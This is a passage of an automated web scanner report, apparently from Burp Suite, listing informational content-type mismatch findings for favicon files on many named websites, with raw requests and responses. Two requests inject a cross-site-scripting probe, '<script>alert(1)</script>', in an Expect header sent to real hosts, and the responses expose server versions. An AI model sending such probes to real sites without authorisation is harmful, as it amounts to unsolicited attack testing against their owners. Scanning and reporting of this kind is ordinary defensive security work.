Last-Modified: Sat, 05 Dec 2009 20:43:00 GMT
ETag: "50e04-37e-451e1d00"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .................................... 999YTTT.|||.|||.UUU.999Z...!............ddd.................................fff.....kkk.......................................
...[SNIP]...

31.55. http://www.coloring-page.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.coloring-page.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.coloring-page.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 08:42:36 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 13 Nov 2006 04:23:53 GMT
ETag: "545145-2fe-44f0c840"
Accept-Ranges: bytes
Content-Length: 766
Connection: close
Content-Type: text/plain

...... ..............(... ...@.....................................................................................................................3................0...............1...............0..
...[SNIP]...

31.56. http://www.coloringcastle.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.coloringcastle.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.coloringcastle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:48:28 GMT
Server: Apache/1.3.41 Ben-SSL/1.59 (Unix)
Last-Modified: Wed, 21 Feb 2007 21:02:51 GMT
ETag: "798b8d3-57e-45dcb37b"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain

..............h.......(....... ...........@................................-f..s....t.t.5...............................................................................................................
...[SNIP]...

31.57. http://www.comfortmarket.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.comfortmarket.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.comfortmarket.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Tue, 03 May 2011 10:52:55 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.58. http://www.corestandards.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.corestandards.org
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.corestandards.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:42:35 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 27 May 2010 19:30:50 GMT
ETag: "d19885-57e-6d936e80"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...............................$<..x.......u...........\...%C..;...&c......$B..O..!M..@y..?:.. <..$J....D."p........J.%)p.7f..'h..6m..'a~..3...1.......;...3......W...$X
...[SNIP]...

31.59. http://www.costcentral.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.costcentral.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.costcentral.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:33:58 GMT
Server: Apache/2.2.16 (EL)
Last-Modified: Fri, 02 Nov 2007 18:50:36 GMT
ETag: "15a800b-2566-43df6a4625700"
Accept-Ranges: bytes
Content-Length: 9574
Cache-Control: max-age=604800, public
Content-Type: text/plain; charset=UTF-8

...... ..........F...........h....... .... .....V......... .h.... ..(... ...@.........................................................................................................................
...[SNIP]...

31.60. http://www.craigslist.at/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.craigslist.at
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.craigslist.at
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Mon, 23 Jun 2008 23:06:11 GMT
Cache-Control: public, max-age=315360000
Accept-Ranges: bytes
Date: Mon, 02 May 2011 22:11:07 GMT
Vary: Accept-Encoding
Content-Length: 1150
Content-Type: text/plain
Server: Apache
Expires: Thu, 29 Apr 2021 22:11:07 GMT

............ .h.......(....... ..... ...........................................]2..]...]...]...]...]...]...]2..........................]
..]...]...]...]...]...]...]...]...]...]...]
..............]
..
...[SNIP]...

31.61. http://www.crowleymarine.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.crowleymarine.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

31.62. http://www.cyberfinder.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.cyberfinder.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cyberfinder.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 05:42:34 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 25 Sep 2006 20:31:35 GMT
ETag: "114817b-c6-137b37c0"
Accept-Ranges: bytes
Content-Length: 198
Connection: close
Content-Type: text/plain; charset=UTF-8

......................(....... .......................................................................................................................................................................

31.63. http://www.danomatic.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.danomatic.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.danomatic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:30:58 GMT
Server: Apache/2.2.8 (Fedora)
Last-Modified: Tue, 29 Mar 2011 16:53:23 GMT
ETag: "de006a-cbe-49fa1e5ee66c0"
Accept-Ranges: bytes
Content-Length: 3262
Connection: close
Content-Type: text/plain

...... ..............(... ...@...............................h|.g{.k~.j~.g{.i|.k.k.i}.fz.h}.j~.j~.j~.g{.g{.h|.h|.i}.k.l..k.l.j~.h|.h|.i}.j~.i}.h|.h|.h|.l..i}.i}.j~.i~.i}.h|.h}.k..i}.i~.i|.h|.j~.
...[SNIP]...

31.64. http://www.darkecountyfair.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.darkecountyfair.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.darkecountyfair.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:07:16 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Wed, 20 May 2009 17:00:43 GMT
ETag: "c3b0a4c-9f6-f7c004c0"
Accept-Ranges: bytes
Content-Length: 2550
Connection: close
Content-Type: text/plain

..............h...&......... .h.......(....... .......................................................................ff......^^......qq..............nn..................................bb............
...[SNIP]...

31.65. http://www.davison.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.davison.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.davison.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:35:48 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Tue, 02 Sep 2008 14:24:29 GMT
ETag: "11902d9-47e-7a46a140"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ....................................................p.......0.......................................0.......p......................................................
...[SNIP]...

31.66. http://www.deanza.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.deanza.edu
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.deanza.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:26:54 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 16 Aug 2007 15:31:57 GMT
ETag: "98808b-8be-437d2c6559540"
Accept-Ranges: bytes
Content-Length: 2238
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Language: en

...... ..............(... ...@.........................................................................................................................................................................
...[SNIP]...

31.67. http://www.dezignwithaz.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.dezignwithaz.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dezignwithaz.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:22:50 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Feb 2011 10:08:19 GMT
Accept-Ranges: bytes
Content-Length: 1406
Cache-Control: public
Expires: Thu, 5 Apr 2012 00:00:00 GMT
Content-Type: text/plain

..............h.......(....... ................................0...P...........@...`..y................p.......... ....................................................................................
...[SNIP]...

31.68. http://www.diesel.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.diesel.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.diesel.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 19 Jan 2010 16:54:35 GMT
ETag: "3fa1bcc-1636-531848c0"
Accept-Ranges: bytes
Content-Length: 5686
Content-Type: text/plain
Date: Tue, 03 May 2011 10:38:55 GMT
Connection: close

..............h...&... .... .........(....... ...............................$...(...-...E#..F#..H%..H&..I'..X8..[<..hN..mR..~f..f...l...p...s...x....................................................
...[SNIP]...

31.69. http://www.diethealthclub.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.diethealthclub.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.diethealthclub.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:28:23 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 07 Apr 2010 08:59:06 GMT
ETag: "29c00d1-13e-483a1c6418a80"
Accept-Ranges: bytes
Content-Length: 318
Content-Type: text/plain

..............(.......(....... .......................................3f3.....................................................""""""""""""""""""""""""""""""""""""""""!.".!"."!"..!!".!"..!!""!"...!""!"
...[SNIP]...

31.70. http://www.direct.tv/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.direct.tv
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.direct.tv
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:28:49 GMT
Server: Apache
Last-Modified: Thu, 22 Jul 2010 11:23:36 GMT
ETag: "57e-48bf82634fe00"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain; charset=UTF-8

..............h.......(....... .....................................o...u.q]G......k%.vi`.aRH...y..........{...............n ...................?.......................................................
...[SNIP]...

31.71. http://www.directboats.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.directboats.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.directboats.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Tue, 03 May 2011 10:15:24 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.72. http://www.dispatchinteractive.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.dispatchinteractive.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dispatchinteractive.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:03:27 GMT
Server: Apache
Last-Modified: Fri, 09 May 2003 17:47:09 GMT
ETag: "da26f-57e-3bd3ed167e140"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain
Vary: Accept-Encoding

..............h.......(....... ...........@........................yd..I$......v...r...w"......x...........b.......i ...........f..........e....k......E....Y..y.... ..<...d....)..Z...e.......}.......D
...[SNIP]...

31.73. http://www.downy.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.downy.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.downy.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:59:43 GMT
Server: Apache
Last-Modified: Fri, 29 Apr 2011 09:00:09 GMT
ETag: "e2c1a-df6-4a20ae698f840"
Accept-Ranges: bytes
Connection: close
Content-Type: text/plain
Content-Length: 3574

..............(...&... ..........N...(....... ................................``..TT.........................................................DDD@.DDDDDD..DDDDD@03.DDDD3.00DDD@33..4DD..A030DD000.C...3
...[SNIP]...

31.74. http://www.dulcolaxusa.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.dulcolaxusa.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dulcolaxusa.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

31.75. http://www.dyessworldwide.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.dyessworldwide.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dyessworldwide.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:32:53 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html; charset=iso-8859-1
Age: 0
Proxy-Connection: close
Server: YTS/1.19.8

<h1 style='color:#497A97;font-size:12pt;font-weight:bold'>404 - Not Found

31.76. http://www.eaglesband.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.eaglesband.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.eaglesband.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:36:34 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 16 Oct 2007 16:36:14 GMT
ETag: "55d0030-9f6-c88c9b80"
Accept-Ranges: bytes
Content-Length: 2550
Connection: close
Content-Type: text/plain

..............h...&...........h.......(....... ...........@.............................................................................................................................................
...[SNIP]...

31.77. http://www.educatedonline.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.educatedonline.net
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: image/bmp

The response states that it contains a BMP image. However, it actually appears to contain a GIF image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.educatedonline.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:53:47 GMT
Server: Apache/2.2.16 (Fedora)
Content-length: 539
Last-Modified: Thu, 20 Aug 2009 00:42:34 GMT
Connection: close
Content-Type: image/bmp

GIF89a....................................................................................l..k.....Q..W..F..O..?y.2t..w.0~.=s./e..a..p..p..U..H..<..>..2..*~..s..o..n..n..p..k..k..j. h..g..h. f..h..g..
...[SNIP]...

31.78. http://www.esa.int/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.esa.int
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.esa.int
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:32:51 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n7.panthercdn.com
ETag: "f9b20-13e-3ee0a9b41db00"
Cache-Control: max-age=116961
Expires: Wed, 04 May 2011 12:25:09 GMT
Age: 23823
Content-Length: 318
Content-Type: text/plain
Last-Modified: Wed, 19 Jan 2005 17:04:12 GMT
Connection: keep-alive

..............(.......(....... ....................................tc.}\K...t.....nM<...........................................................@2#.....5UR0H..CUU8@....UQ.%P..22S.....!.P....."2P.S...5
...[SNIP]...

31.79. http://www.eslteachersboard.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.eslteachersboard.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.eslteachersboard.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:10:28 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sun, 14 Nov 2010 04:06:27 GMT
ETag: "279801a-9f6-729656c0"
Accept-Ranges: bytes
Content-Length: 2550
Connection: close
Content-Type: text/plain

..............h...&......... .h.......(....... ...................................4/..B=..OK..]Y..jg..xu..............................'"..S.k.i.n.s.\.N.e.w. .l.o.g.o.\.w.o.r.k. .P.L.E.S.K.\.i.c.o.\._.
...[SNIP]...

31.80. http://www.everestcollege.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.everestcollege.edu
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.everestcollege.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:37:44 GMT
Server: Apache/2
Last-Modified: Sat, 06 Feb 2010 02:40:08 GMT
ETag: "868064-10be-47ee57c7cb200"
Accept-Ranges: bytes
Content-Length: 4286
X-Served-By: www2
Connection: close
Content-Type: text/plain; charset=UTF-8

...... .... .........(... ...@..... .........................iD..iD..iD..iD..iD..iD..iD..iD..iD..iD..iD..iD..iD..iD..iD..iD..iD..iD..iD..iD..iD..iD..iD..iD..iD..iD..iD..iD..iD..iD..iD..iD..jD..jD..jD
...[SNIP]...

31.81. http://www.expedient.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.expedient.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.expedient.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:02:59 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 03 Mar 2010 20:06:28 GMT
ETag: "56bf15-47e-47fd900"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

31.82. http://www.expertsatellite.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.expertsatellite.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.expertsatellite.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:05:06 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
ETag: "13e-48bf77af67dc0"
Last-Modified: Thu, 22 Jul 2010 10:35:43 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 318

..............(.......(....... ................................Y........K.....................................................................................................................""""""""""
...[SNIP]...

31.83. http://www.extremeoverclocking.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.extremeoverclocking.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.extremeoverclocking.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:26:13 GMT
Server: Apache
Last-Modified: Sun, 07 Jan 2001 20:20:59 GMT
ETag: "1050349-57e-37a4da6c300c0"
Accept-Ranges: bytes
Content-Length: 1406
Vary: User-Agent
Content-Type: text/plain

..............h.......(....... ................................................................................................\I..\H..ZG..XF..WE..WE..VD..N>..WE.._K..\I..[H..^J..\I.F)!..W@..ZD..R>..`
...[SNIP]...

31.84. http://www.extremeskins.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.extremeskins.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.extremeskins.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 May 2011 10:32:05 GMT
Content-Type: text/plain; charset=UTF-8
Connection: keep-alive
Last-Modified: Thu, 17 Mar 2011 02:24:10 GMT
ETag: "6a880d7-37e-49ea45b464680"
Accept-Ranges: bytes
Content-Length: 894

..............h.......(....... .....................................".1..........?V.m..~. v..Wl.......................%... Lc..4..w........X......w............... .).d.".......................P.....
...[SNIP]...

31.85. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

31.86. http://www.fantasiaofficial.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.fantasiaofficial.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fantasiaofficial.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:59:08 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Length: 33
Connection: close
Content-Type: text/html; charset=iso-8859-1

The requested file was not found.

31.87. http://www.fastbooking.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.fastbooking.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a GIF image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fastbooking.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:20:49 GMT
Server: Apache
Vary: Accept-Encoding
Last-Modified: Mon, 03 Jan 2011 09:50:20 GMT
ETag: "9c0eaf-a2-4d219bdc"
Accept-Ranges: bytes
